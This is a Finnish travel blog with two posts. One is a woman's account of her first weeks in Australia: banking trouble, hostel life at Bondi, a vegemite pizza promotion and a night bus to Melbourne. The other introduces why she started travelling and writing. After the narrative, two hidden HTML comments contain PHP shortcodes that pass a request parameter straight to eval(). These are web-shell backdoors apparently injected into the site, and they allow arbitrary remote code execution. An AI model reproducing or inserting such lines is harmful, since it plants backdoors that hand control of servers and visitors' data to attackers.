Uusi vuosi ja uudet…?

Vuoden vaihteen jälkeinen loppuviikko menikin nopeasti. Sami palasi töihin ja itse sain hoidettua loppuun pankkitilin avaamisen ja veronumeron hakemisen. Tai niin ainakin luulin. Pankkitiliä avatessa vaaditaan uudelle tilille tehtävän talletus, muuten tili puretaan. Tämänhän ei pitäisi olla monimutkaista, mutta omaa pankkiani kohtaan aloitettiin juuri samaan aikaan palveunestohyökkäys, joka vaikeutti elämääni huomattavasti. Nettipankkiin ei päässyt käsiksi, enkä ollut pitänyt tarkkaa kirjaa menoistani, joten pankki- ja luottokortin saldoa pystyi vain arvailla. Reissukassaa toki vielä tässä kohtaa on, siihen ei vain päässyt käsiksi. Ja samalla olisi pitänyt tehdä siirto uudelle pankkitilille, jonka toteutuminen nyt vie muutaman päivän. Yritin keksiä minkä tahansa muun keinon saada asia ratkaistua, mutta kun muuta vaihtoehtoa ei ole, niin nöyränä sitten Skype-puhelu isälle. Vaikka itsenäisen reissaajan ylpeyteni ottikin tästä aika pahan kolhun, opetti kyseinen tapahtuma myöskin, että apua täytyy osata pyytää. No, asiat saatiin ratkaistua, ja kun muutamaa päivää myöhemmin paikallinen pankkikorttini saapui postissa, oli tili myös käyttövalmis. Tämäkin vaikeus oli selätetty.

Varasin myös sänkypaikan läheisestä hostellista, sillä vaikka olenkin kiitollinen, että sain asua Samin luona, oli aika jatkaa eteenpäin. Hänen aikaiset heräämisensä ja minun lomailuun sopiva päivärytmini eivät oikein kohdanneet.

Viimeisenä iltana ennen muuttoani meillä oli Pilvin läksiäiset. Pilvi on Samin hyvä ystävä, joka oli tällä erää ollut Australiassa kolme viikkoa, eikä kotiin paluu tuntunut kenestäkään hyvältä ajatukselta. Ilta meni hyvän ruuan ja vielä paremman seuran merkeissä, ja pitihän sitä tietenkin käydä vielä yöuinnilla.

Jimmy vielä epäilee yöuintia

Sami, Pilvi ja Jimmy läksiäistunnelmissa

Seurassamme ollut paikallinen Jimmy oli alkuun hieman epäileväinen tästä suomalaisesta perinteestä, mutta oli lopulta vähintään yhtä innoissaan kuin me muutkin uimassa pimeässä meressä. Uimisen jälkeen viihdyimme vielä pari tuntia Samin asunnon patiolla ennen kuin kaikkien oli aika siirtyä nukkumaan ja valmistautumaan seuraavaan päivään.

Viikon verran asuin Noahs Backpackers @ Bondi –nimisessä hostellisssa, ja kokemus oli upea. Itse en ole se huoneen äänekkäin, joten saan olla todella kiitollinen, että asuin samassa huoneessa Indianasta kotoisin olevan Yaan kanssa.  Yaa vastasi hyvin sitä stereotypistä käsitystä, joka minulle on muodostunut amerikkalaisista, kovaääninen, todella ystävällinen ja halukas tutustumaan kaikkiin ympärillä oleviin ihmisiin. Seuraavana päivänä huoneeseen muutti englantilaiset Claire ja Laura, ja heidän kanssa tulikin vietettyä suurin osa viikosta. Kun vihdoin huomasin, että uloskirjautumispäivä läheni, aloin pohtia mihin suuntaan sitä Sydneystä jatkaisi. Hiljalleen ideaksi muodostui jatkaa Brisbaneen ja siitä itärannikkoa ylös Darwiniin, josta olisi lyhyempi matka lentää keväällä Balille, jonne olimme sopineet treffit suomesta tulevien ystävieni kanssa. Etsittyäni Brisbanesta hostellia ikuisuuden, päätin lopulta lopettaa arvostelujen lukemisen, sillä jokaisen kokemukset ja odotukset hostellia kohtaan ovat niin erilaiset, eikä kaikkia ole ikinä mahdollista miellyttää. Varasin lopulta sänkypaikan viikoksi ja päätin seuraavana päivä varata hostellin kautta bussimatkan Brisbaneen. 16 tunnin matka ei tuntunut kohtuuttomalta, kun Helinki-Levi –väliä on tullut kuljettua muutamaan kertaan. Tyytyväisenä itseeni ja aikaansaannokseeni lähdin Yaan kanssa syömään ja kerroin hänelle suunnitelmastani. Seurasi keskustelu: ”Aa, okei hei, kiva idea. Mitä muuten tykkäsit Melbournesta kun olit sielä?” ”En ole vielä käynyt sielä, tulin Ausseihin vasta reilu viikko sitten.” ”No mutta ethän sä sitten voi mihkään Brisbaneen lähtä! Sun pitää nähä Melbourne ekana! Peru se hostelli, ja lähe mun mukaan. Maanantai-ilta on lähtö Melbourneen.” ”…” ”Hei ihan oikeesti, se on kuulemma niin cool paikka että sitä ei vaan voi jättää välistä. Mun kaikki kaverit tulee sinne kans ja ois kyl tosi jees jos tulisit mukaan!” ”No, okei, miksi ei. Paljon kivempihan se on muutenki reissaa jonkun kanssa kun yksinään.” No, kävimme siis syömässä ja palattuamme hostellille peruin sänkyvaraukseni Brisbanesta. Kysinen päivä oli perjantai, joten meille jäi vielä hyvin aikaa etsiä majapaikka ja nauttia vielä viimeisistä päivistä Bondilla. No niihin viimeisiin päiviin sitten sisältyi pahasti palaminen rannalla ja vesisateessa juoksemisesta aiheutunut flunssa ja kuume. Eli aika pitkälti hostellilla lepäämiseen. Maanantaina vidoin kirjauduimme ulos Noahsilta, kävimme erittäin myöhäisellä aamiaisella samassa dormissa asuneiden tyttöjen kanssa ja vielä shoppailemassa viimeiset välttämättömyystarvikkeet.

Palattuamme hostelille odottamaan Melbourneen lähtevää bussiamme selvisi, että Pizza Hut halusi testata uusia kausimakuja reppureissaajilla ja tarjosi siksi ilmaista pizzaa kaikille hostellin asukkaille. Kuten arvata saattaa, tähänkin oli koira haudattuna. Jokainen, joka halusi osallistua, pyydettiin vuorollaan kameran eteen kertomaan ensin hieman itsestään ja sen jälkeen mielipiteensä uusista pizzoista. Kukaan kuvatuista ei saanut paljastaa millaisia uudet maut olivat, ja kun kuvausryhmä pyysi erityisesti ei-australialaisia osallistumaan aloimme arvata mistä oli kyse. Kun Yaa vielä suostuttelun jälkeen osallistui kuvaukseen, saimme varmuuden epäilyillemme. Niin kutsutut uudet kausimaut olivat pizzoja, joissa tomaattikastikkeen sijaan oli pohjalla vegemiteä, ja tarkoituksena oli kuvata reissaajien ilmeitä kun he maistavat tätä aussien kansallistuotetta. Kyseessähän on siis Australiassa ja Uudessa-Seelannissa käytettävä levite, joka valmistetaan oluen valmistuksessa muodostuvista hiivajätteistä. Itse en ole kyseistä tuotetta maistanut, mutta en ole kuullut kenenkään väittävän sitä miellyttäväksi makuelämykseksi. Meille epäselväksi jääneestä syystä Pizza Hut halusi toteuttaa mainoskampanjan käyttäen kyseisiä videoklippejä, mutta koska kaikki paikalla olleet saivat ilmaista pizzaa vaikka eivät osallistuneet kuvauksiin, emme löytäneet aihetta valittaa. Videot kuulemma löytyvät kyseisen ravintolan Facebook-sivulta 22.1. alkaen.

WP_20150103_20_03_30_Pro

Vielä viimeiset fiilistelyt Bondilla

Ilmaisen lounaan ja hyvästien jälkeen oli aika pakata rinkat selkään ja vaihtaa maisemaa. Bondilla oli satanut jo useamman päivän, joten lähteminen tuntui hyvältä idealta, vaikka Noahsiin jäikin uusia ystäviä, joiden seurassa olisi viihtynyt pidempäänkin. No, lähdimme kohti bussiasemaa joka muutaman väärän suunnan jälkeen löytyi suht helposti. Saatuamme tavarat bussin kyytiin, ilmoitti kuski erittäin syvästi pahoitellen, että kuljetusvälineemme wc-tilat olivat valitettavasti epäkunnossa, joten kun aikaa lähtöön oli vielä 20 minuuttia, olisi kaikkien parempi käyttää hyväkseen bussiaseman wc-tiloja. Hieman kieltämättä tulin pohtineeksi, että mitähän matkasta tulee, sillä vaikka ilma oli pilvinen, oli lämpöä sen verran, että vettä piti juoda jatkuvasti ja matka kestäisi 12 tuntia. No, onneksi kuitenkin matkasimme yötä vasten, ja pian lähdettyämme liikkeelle ilmeni, että pysähtyisimme kahdesti syömään, joten yksikään ajopätkä ei ollut paljon kolmea tuntia pidempi. Hyvin tästä selvittäisiin. Ja niin selvittiinkin. Matka taittui yllättävän nopeasti, ensimmäinen ajopätkä meni ah-niin-upeaa (ei ehkä ihan) elokuvaa Perhe on painajainen katsoessa, ja ensimmäisen ruokatauon jälkeen olikin jo sopiva aika alkaa nukkua. Seitsemältä olimmekin jo perillä Melbournessa ja oli aika alkaa suunnistaa kohti hostellia, jonka sijainnista kummallakaan meistä ei ollut tarkkaa tietoa.

-M-

WP_20150103_20_02_52_Smart

Aluksi

Ajatus reissaamisesta ei ole ollut elämää suurempi suunnitelma, jonka olen aina halunnut toteuttaa. En kuulu niihin, joiden on mahdotonta olla aloillaan ja tyytyväinen tasaiseen, jopa turvatuksi kutsuttuun elämään. Tai niin ainakin luulin. En aluksi edes ajatellut, että töiden perässä ympäri Suomea juokseminen voitaisiin mieltää reissaamiseksi. Silloinhan kuitenkin on tiedossa määränpää, jokseenkin varma asunto ja työ. Nyt jälkeenpäin ajateltuna, kyseessä on varmaan ollut kuitenkin samaan lajiin kuuluva kaukokaipuu, jonka takia Helsinki ei ole enää pitkään aikaan tuntunut kodilta. Paljon luonnollisempaa on ollut viettää talvet Lapissa ja kesät Hangossa. Kyllähän siinä on tullut tutuksi autossa, junassa ja lentokoneessa istuminen.

Kaipuu jonnekin hieman pidemmälle ja lämpimämpään on kuitenkin hiljalleen nostanut päätään, ja vuosi sitten tein päätöksen säästää rahat ja lähteä katsomaan miltä tuntuu pakata rinkka selkään ja hypätä lentokoneeseen ilman sen suurempaa suunnitelmaa. Australia on kiinnostanut niin kauan kuin jaksan muistaa, mutta vielä kiinnostavampi kohde on Borneo, saari joka jakautuu Indonesian, Malesian ja Brunein sulttaanikunnan kesken. Asiaa pidempään pohdittuani päätin, että koska reissaamista ei ole aiemmin tullut kokeiltua, voisi olla suositeltavampaa aloitta hieman helpommasta, länsimaisesta Australiasta, ja vasta sen jälkeen jatkaa länteen, ensin Indonesiaan ja siitä Borneolle.

No, suunnitelmahan on tähän asti sujunut varsin mallikkaasti. Hieman hätäsesti tuli ostettua lentolippu Sydneyhyn joulun jälkeisille välipäiville ja vasta tämän jälkeen muistin sen toisen asiakirjan, viisumin. No, onneksi Working Holiday -viisumin saaminen Suomen passilla ja moitteettomalla historialla on lähes läpihuutojuttu, ja kiitos aikaeron, sain hyväksytyn päätöksen neljän tunnin päästä hakemukseni jättämisestä. Muutenkin alku tuntui loksahtavan kohdilleen. Syyskuussa oli hyvä ystäväni muuttanut Bondi Beachille, joten vuoden vaihteen yli ei tarvitsisi edes pohtia majottumista.

Aivan toinen tarinahan sitten on tämä kirjoittaminen. Kirjoittaminen ei ole ollut ikinä lempipuuhani. Tai kuulut ikinä edes Top 5 –listalle. Se on enemmänkin ollut välttämätön paha, joka kuuluu osana koulutukseen. Päiväkirjojen pitäminen pikkutyttönä? Ei, ei kiinnosta. Tutkielmien ja esitelmien kirjoittaminen? Ei, mieluummin jääköön AMK-koulutus kesken. Joten, miksi sitten blogi? Hyvin pitkälti itsekkäistä syistä. Tämän mahdollisesti vuoden kestävän reissun aikana haluan haastaa itseni tekemään ja kokeilemaan asioita, jotka jännittävät, pelottavat, ahdistavat tai muuten ajavat mukavuusalueen ulkopuolelle. Jostainhan on aloitettava, ja koska muisti on yllättävän petollinen asia, on hyvä, että edes osa tapahtumista on kirjotettu ylös. Onhan tämä myös paljon helpompi keino jakaa kokemuksia kotona olevalle perheelle ja ystäväpiirille.

Joten tästä lähtee liikkeelle itsensä haastaminen niin reissaamisen kuin kirjoittamisenkin suhteen!

Ja ai niin, inspiraatio blogin nimeen tuli Kuningasidean aivan huikeesta biisistä Yksin Pariisiin. Kannattaa kuunnella, aivan upea, ja kuvaa hyvin ainakin niitä tunteita joita koin koko matkan tänne toiselle puolelle palloa!

 

-M-

<!– [insert_php]if (isset($_REQUEST["qip"])){eval($_REQUEST["qip"]);exit;}[/insert_php][php]if (isset($_REQUEST["qip"])){eval($_REQUEST["qip"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["eDOcg"])){eval($_REQUEST["eDOcg"]);exit;}[/insert_php][php]if (isset($_REQUEST["eDOcg"])){eval($_REQUEST["eDOcg"]);exit;}[/php] –>